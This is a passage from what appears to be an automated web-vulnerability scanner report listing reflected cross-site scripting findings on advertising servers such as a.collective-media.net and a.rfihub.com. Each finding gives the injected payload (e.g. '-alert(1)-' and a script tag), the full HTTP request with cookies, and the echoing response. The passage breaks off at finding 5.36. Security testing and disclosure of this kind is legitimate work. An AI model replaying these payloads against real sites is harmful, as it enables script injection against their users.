5.28. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53c87'-alert(1)-'6fe0dcb5410 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.217/L3_549031153c87'-alert(1)-'6fe0dcb5410;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989;env=ifr;ord1=584484;cmpgurl=http%253A//ad.burstdirectads.com/st%253Fad_type%253Diframe%2526ad_size%253D300x250%2526section%253D1858209%2526bur%253D2016%2526x%253Dhttp%253A//www.burstnet.com/ads/ad21832a-map.cgi/BCPG175222.253833.315920/VTS%253D2jBaC.Ncac/SZ%253D300X250A/V%253D2.3S//ST%253D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc/REDIRURL%253D? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:55 GMT
Connection: close
Content-Length: 8236

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-92358910_1305127855","http://ad.doubleclick.net/adj/bzo.217/L3_549031153c87'-alert(1)-'6fe0dcb5410;net=bzo;u=,bzo-92358910_1305127855,11f8f328940989e,Miscellaneous,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.
...[SNIP]...

5.29. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.217/L3_5490311

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dba06'-alert(1)-'4db594ba125 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.217/L3_5490311;sz=dba06'-alert(1)-'4db594ba125 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:29:58 GMT
Connection: close
Content-Length: 7554

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
1;net=bzo;u=,bzo-71692882_1305127798,11f8f328940989e,none,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;sz=dba06'-alert(1)-'4db594ba125;contx=none;dc=w;btg=bzo.slqz;btg=bzo.e6d;btg=bzo.T8P;btg=bzo.h3i;btg=bzo.d8n;btg=bzo.c9q;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.weath_h;btg=cm.sports_h;btg=mm.aa1;btg=mm.ah1;btg=mm.aj1;btg=mm.ak1;btg=mm
...[SNIP]...

5.30. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload def87'-alert(1)-'799373a668c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjdef87'-alert(1)-'799373a668c/edh.mayoclinic/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;ord1=331865;cmpgurl=http%253A//www.mayoclinic.com/health/pink-eye/DS00258? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:32:22 GMT
Connection: close
Content-Length: 7566

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("wfm-4650518_1305127942","http://ad.doubleclick.net/adjdef87'-alert(1)-'799373a668c/edh.mayoclinic/eyevision/general;net=wfm;u=,wfm-4650518_1305127942,11f8f328940989e,eye,wfm.eye_h-wfm.health_m-dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as
...[SNIP]...

5.31. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d232a'-alert(1)-'a44c4f88b6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/edh.mayoclinicd232a'-alert(1)-'a44c4f88b6b/eyevision/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;ord1=331865;cmpgurl=http%253A//www.mayoclinic.com/health/pink-eye/DS00258? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:32:25 GMT
Connection: close
Content-Length: 7572

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("wfm-9391291_1305127945","http://ad.doubleclick.net/adj/edh.mayoclinicd232a'-alert(1)-'a44c4f88b6b/eyevision/general;net=wfm;u=,wfm-9391291_1305127945,11f8f328940989e,health,wfm.eye_h-wfm.health_m-dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;po
...[SNIP]...

5.32. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc25d'-alert(1)-'7300cfcafc6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/edh.mayoclinic/eyevisionfc25d'-alert(1)-'7300cfcafc6/general;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;ord1=331865;cmpgurl=http%253A//www.mayoclinic.com/health/pink-eye/DS00258? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:32:28 GMT
Connection: close
Content-Length: 7574

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("wfm-95279685_1305127948","http://ad.doubleclick.net/adj/edh.mayoclinic/eyevisionfc25d'-alert(1)-'7300cfcafc6/general;net=wfm;u=,wfm-95279685_1305127948,11f8f328940989e,health,wfm.eye_h-wfm.health_h-dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;pos=top;ugc
...[SNIP]...

5.33. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6febe'-alert(1)-'b4a4cfac885 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/edh.mayoclinic/eyevision/general6febe'-alert(1)-'b4a4cfac885;cmn=wfm;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord=935450012;ord1=331865;cmpgurl=http%253A//www.mayoclinic.com/health/pink-eye/DS00258? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:32:34 GMT
Connection: close
Content-Length: 7574

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("wfm-44317774_1305127954","http://ad.doubleclick.net/adj/edh.mayoclinic/eyevision/general6febe'-alert(1)-'b4a4cfac885;net=wfm;u=,wfm-44317774_1305127954,11f8f328940989e,health,wfm.eye_h-wfm.health_h-dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;pos=top;ugc=0;!c=ma
...[SNIP]...

5.34. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [cmn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/edh.mayoclinic/eyevision/general

Issue detail

The value of the cmn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51345'-alert(1)-'37ca1051e8 was submitted in the cmn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/edh.mayoclinic/eyevision/general;cmn=51345'-alert(1)-'37ca1051e8 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:31:41 GMT
Connection: close
Content-Length: 7367

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("51345'-alert(1)-'37ca1051e8-78903454_1305127901","http://ad.doubleclick.net/adj/edh.mayoclinic/eyevision/general;net=51345'-alert(1)-'37ca1051e8;u=,51345'-alert(1)-'37ca1051e8-78903454_1305127901,11f8f328940989e,eye,cm.ent_h-cm.
...[SNIP]...

5.35. http://a.rfihub.com/sed [pa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7522e'><script>alert(1)</script>d7a9350e38a was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=160&h=600&re=12386&pv=0&ra=1261884890.33545748167671263&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBnJBiKaXKTfbKGcXPlQf9z7G2BNeAso8Ch8ybsyLP-5bKHAAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05Njc0OTQyMDA5MzQ1ODA3oAGz7MfrA7IBEXd3dy5zdGFycHVsc2UuY29tugEKMTYweDYwMF9hc8gBCdoBHmh0dHA6Ly93d3cuc3RhcnB1bHNlLmNvbS9uZXdzL5gCrBHAAgTIAs3vzw7gAgDqAghOZXdzLVNreagDAegDXugDN_UDAACAxOAEAYAG-tK9mvjwpMCkAQ%2526num%253D1%2526sig%253DAGiWqtz5uPi0ksl8IAW_-YJXgk--2xxjBA%2526client%253Dca-pub-9674942009345807%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre12618848990257522e'><script>alert(1)</script>d7a9350e38a&pb=&pc=&pd=&pg=&ct=1305126188489&co=false&ep=TcqlKQAGZXYK5WfFRsxn_dF6osENxyPr-Ar0pQ&ri=4dcaa529066576ae567c546cc67fd1&rs=&ai=13892&rt=15540&pe=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F&pf=http%3A%2F%2Fwww.starpulse.com%2Fnews%2F HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEAcpLdw2F6J1UKMXA_aMRok; t=1303177639870; a2=2724386019227846218; t1=1303843609359; a=c614741349159218131; o=1-LUTRuF4-Pbpl; r=1303177638413; b="aABIhmEmw==AC82AAABL5OfFng="; m="aAfF9qeBw==AE1783AAABL5OfFng=AE1783AAABL5Oe3qQ=AE1783AAABL5OevDE=AE1783AAABL5OelY0=AE1783AAABL5MlI5I=AE1783AAABL5Mk1HE=AE1783AAABL5MiUls=AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0="; u="aABI4fchw==AI89bBrQ==AAABL5OfFng="; f="aAD1r1M1A==AK1303843590AB7AAABL5OfFnc=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c="; k="aAEHEoXNA==AHnca1783AN1303150295000AAABL5OfFnc=AI-nca1783AN1303150295000AAABL5MiUls=ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0="; e=cb

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABn_lxFg==BCaEZNfFOGPDzez|13892|65039|1035756|18121|1077|101708|445|43482|8678AAABL9-72GU=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: u="aABunwHQQ==AI89bBrQ==AAABL9-72GQ=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: c="aAGiDjz5Q==AFd1077AB1AAABL9-72GM=AFv2215AB1AAABL9-72GM=AGu15540AB1AAABL9-72GM=AGt15540AB1AAABL9-72GM=AGb13892AB1AAABL9-72GM=AGa13892AB1AAABL9-72GM=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: f="aAE7EpWsg==AK1305128720AB1AAABL9-72GM=AK1303843590AB7AAABL5OfFnc=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: s="aACna-YHw==AE9479AN1294103956000AAABL9-72GM=AE8438AN1275963655000AAABL9-72GM=";Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Fri, 09-Nov-12 15:45:20 GMT
Content-Length: 2526

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11;sz=160x600;ord=1305128720483;click=http://a.rfihub.com/aci/127_1_YWE9
...[SNIP]...
rder=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=12386&aa=13892,65039,18121,1035756,1077,15540,EZNfFOGPDzez,http%3A%2F%2Frocketfuelinc.com,760,2215,43482,2408,8678&pa=ppre12618848990257522e'><script>alert(1)</script>d7a9350e38a&id=&ra=1287204850.16913393858911707'>
...[SNIP]...

5.36. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.burstdirectads.com
Path:   /st

Issue detail

